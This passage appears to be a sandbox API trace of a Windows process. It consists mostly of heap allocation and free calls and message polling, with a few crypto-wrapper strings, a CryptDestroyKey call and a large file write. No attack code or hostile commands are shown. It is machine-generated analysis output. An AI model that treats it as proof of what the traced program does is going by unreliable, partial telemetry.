(HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0212.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0212.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0212.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0212.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0212.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0212.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0212.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0212.229] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0212.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0212.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0212.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0212.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0212.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0212.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0212.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0212.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0212.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0212.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0212.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0212.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0212.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0212.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0212.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0212.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0212.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0212.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9ca0) returned 0x2e80330 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0212.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0212.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9ca0) returned 0x2e89fd8 [0212.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0212.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.233] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0212.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0212.233] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0212.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0212.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0212.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0212.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.233] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0212.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0212.234] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0212.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0212.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0212.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0212.234] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0212.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.234] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0212.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0212.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.234] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.234] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0212.234] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.235] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0212.235] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.235] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.235] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.235] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.364] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.364] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.364] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.365] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0x9ca0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0x9ca0, lpOverlapped=0x0) returned 1 [0212.371] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.371] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.371] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0212.371] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.372] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50938, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0212.372] CryptDestroyKey (hKey=0xa872d0) returned 1 [0212.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0212.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0212.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0212.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0212.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0212.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0212.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0212.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0212.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0212.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0212.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0212.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0212.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0212.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0212.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0212.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0212.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0212.374] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0212.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0212.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0212.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0212.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 